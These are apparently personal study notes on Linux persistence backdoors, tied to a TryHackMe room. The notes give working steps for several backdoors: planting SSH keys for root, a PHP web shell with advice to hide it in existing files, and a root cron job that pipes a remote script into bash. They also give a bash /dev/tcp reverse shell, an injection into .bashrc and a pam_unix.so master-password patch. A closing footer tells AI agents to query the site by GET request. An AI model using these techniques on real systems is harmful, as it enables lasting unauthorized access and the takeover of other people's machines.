# Linux Backdoors

{% embed url="<https://tryhackme.com/room/linuxbackdoors>" %}

{% embed url="<https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c>" %}

## Backdoor in-nut-shell

A backdoor is a thing that ensure attackers consistent access to the machine

If the system or the machine is rebooted, shut down or any kind of activity we are still have access to the machine

## SSH backdoors

While doing this it’s usually perform as a high privilege users like root.

The backdoor is basically leaving our ssh key in some user’s home directory

Now first let’s use `ssh-keygen` to generate our ssh keys

<figure><img src="/files/rwrixRkvDtVzextulozH" alt=""><figcaption></figcaption></figure>

cool we have 2 keys here, 1 private `id_rsa` and 1 public `id_rsa.pub` key

Let’s go to `/root/.ssh` . If you don’t see this directory just create one in the root directory `mkdir .ssh`

we put the keys there and in theory we can access the machine via ssh as root every time.

note that we have to change the private key permissions or otherwise it would say the key is insecure or something, let’s do `chmod 600 id_rsa`

And we can do the same old thing: `ssh -i id_rsa root@<target_ip>`

## PHP Backdoors

Again doing this kinds of stuff require high privilege

The web root is located in: `/var/www/html`

This directory is basically a page open to the public which means that everyone can access it via their browser

To do a php backdoor, we need the payloads (php code):

```php
<?php
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
?>
```

* Here’s the breakdown of the code:
  * **It looks for a cmd parameter** in the web request (e.g., in the URL like `http://example.com/script.php?cmd=<some_command>`).
  * **If it finds cmd**:
    * It takes the value you provided for cmd. (let’s say `cmd=ls`)
    * It **runs that value as a command directly on the server's operating system**. (`ls` in this case)
    * It then **shows you the output** of that command in your web browser, wrapped in

      ```
       tags. (as you expect, it shows the list of files)
      ```

You can hide the code in existing php file to make it hard to discover, or change the `cmd` parameter to other things, whatever you like

## CronJob Backdoors

A **cronjob** is an automated task scheduled to run at specific times on a system

It can become a privilege escalation vector if a task running with high privileges (like root) executes a script or program that a lower-privileged user can modify or control

We can inspect the scheduled task by using `cat /etc/crontab`

Once we got root privilege, we can add any schedule tasks as you like, since we are doing backdoor, we are going to add a reverse shell that executes every minute

<figure><img src="/files/tsdHXj5V5YYJ3aiKj9Hp" alt=""><figcaption></figcaption></figure>

We can add this line in our cronjob `* * * * * root curl http://<yourip>:8080/shell | bash`

The shell file:

```bash
#!/bin/bash
bash -i >& /dev/tcp/<ip>/<port> 0>&1
```

We have to listen on specific port for us to get a reverse shell, let’s use netcat `nc -lnvp <port>`

We will need to host using `python3 -m http.server 80` for the server to download the shell file

Once it’s downloaded we get a RCE as root

## .bashrc Backdoors

If a user has **bash** as their login shell, the **".bashrc"** file in their home directory is executed when an interactive session is launched

If you know a user have things like this then we can run the command `echo 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' >> ~/.bashrc` which writes the payload into the the user’s **.bashrc** file

Once the user logged in, it will execute the file. If we just happen to listen on the port at the right time we will get yet another reverse shell

## pam\_unix.so Backdoors

The file **"pam\_unix.so"** is , well , it simply is one of many files in Linux that is responsible for authentication

<figure><img src="/files/ryU43bfkeYLva5iRq0Bn" alt=""><figcaption></figcaption></figure>

As seen here, the file "pam\_unix.so" uses the "unix\_verify\_password" function to verify to user's supplied password

<figure><img src="/files/gUds0D4q8IvRfzutUgGc" alt=""><figcaption></figcaption></figure>

We can see that we added a new line to our code : `if (strcmp(p, "0xMitsurugi") != 0 )`

The `strcmp` compares 2 strings. We compare variable `p` and `0xMitsurugi` at this point

the `p` variable stands for the user's supplied password

So if the user’s supplied password is not the same as `0xMitsurugi` then it will do the following code: `retval = _unix_verify_password(pam, name, p, ctrl);` which performs the **actual, legitimate password check** it uses the system's standard mechanism to compare the password (p) entered by the user (name) against the securely stored password for that user. The result of this check (success or failure) is then stored in the retval variable

Anyone who knows the password `0xMitsurugi` can log in as *any* user on the system, because the code will grant them PAM\_SUCCESS without actually checking that user's real password.

You can find more information here: <https://github.com/segmentati0nf4ult/linux-pam-backdoor> and here <https://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html>

(Maybe I will write the rest of it here some day)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://vix-w1zzer.gitbook.io/vixwizzer/notes/linux/linux-backdoors.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.